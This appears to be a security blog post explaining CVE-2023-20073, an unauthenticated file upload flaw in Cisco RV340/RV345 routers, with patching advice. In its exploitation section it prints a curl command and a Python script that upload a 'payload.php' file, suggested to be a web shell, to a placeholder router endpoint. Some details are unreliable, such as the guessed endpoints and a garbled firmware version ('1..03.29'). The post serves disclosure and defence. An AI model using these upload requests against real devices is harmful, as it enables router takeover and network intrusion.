CVE CyberSecurity Database News

CVE-2023-20073 - Cisco Dual WAN VPN Routers Arbitrary File Upload Vulnerability Explained

Poster -

CVE-2023-20073 is a high-severity security vulnerability found in several business-grade Cisco routers—specifically the RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers. This flaw allows unauthenticated, remote attackers to upload files on the router without logging in. If exploited successfully, an attacker could upload malicious files, potentially taking over the device and compromising an entire network.

In this exclusive long-read, we’ll break down how the vulnerability works in plain English. We'll look at sample exploit requests, how attackers abuse this weakness, and what you should do to protect your network. Links to original advisories and technical references are also included.

The Root Cause

The problem lies in the web-based management interface of affected Cisco routers. Normally, when a user uploads files (such as new firmware or config backups), the router should check if the user is logged in and has admin rights.

With this flaw, the device doesn’t properly enforce these checks. The file upload logic can be reached and used by anyone over the network, even if they’re not logged in!

The relevant bug is described officially by Cisco here

- Cisco Security Advisory for CVE-2023-20073

How Is It Exploited?

The attack can be carried out simply by sending a crafted HTTP POST request to the router’s web interface—no authentication, no login required!

Example Vulnerable Endpoint

In many Cisco RV routers, the file upload functionality is accessible via URLs like:  

http://<router_ip>/upload


or

http://<router_ip>/cgi-bin/webproc


or similar /cgi-bin/ web forms.

Exploit in Practice: HTTP Multipart POST Request

Below is a demonstration of how an attacker might upload a file using curl or Python.

_curl Example:_

curl -k -X POST \
  -F "file=@payload.php" \
  http://192.168.1.1/cgi-bin/vulnerable_upload_endpoint

_Python Example (using requests):_

import requests

url = "http://192.168.1.1/cgi-bin/vulnerable_upload_endpoint"

files = {'file': open('payload.php', 'rb')}
r = requests.post(url, files=files)

print(r.status_code)
print(r.text)

> NOTE: In real attacks, “payload.php” could be any malicious script, web shell, or binary.

Impact—What Can Go Wrong?

- Remote Code Execution: Uploaded files could contain scripts that let an attacker execute arbitrary code or commands on the router

Persistence: Attackers could plant backdoors and stay inside your network, even after reboots

- Network Breach: Since routers see all your traffic, attackers could snoop, redirect, or manipulate your connections

If your router is directly exposed to the Internet, the risk is severe—bots and attackers constantly scan for unpatched devices.

Fixes and Recommendations

Cisco patched this vulnerability in firmware version 1..03.29 (and later) for all affected models.

Update your router’s firmware ASAP!

Official firmware and instructions here

References & Original Advisories

- Cisco Security Advisory for CVE-2023-20073
- NIST National Vulnerability Database Entry
- Cisco RV34X Series Routers – Support Downloads

Conclusion

CVE-2023-20073 is a classic web application bug—missing access control checks on file uploads. Attackers can (and do) exploit these flaws to quickly compromise unpatched business routers, placing entire offices at risk.

Patch ASAP, limit admin interface exposure, and review your router’s logs for suspicious uploads or logins. Take router vulnerabilities as seriously as PC or server flaws—often, they’re the entry point to your whole organization.

Timeline

Published on: 04/05/2023 16:15:00 UTC
Last modified on: 04/11/2023 19:16:00 UTC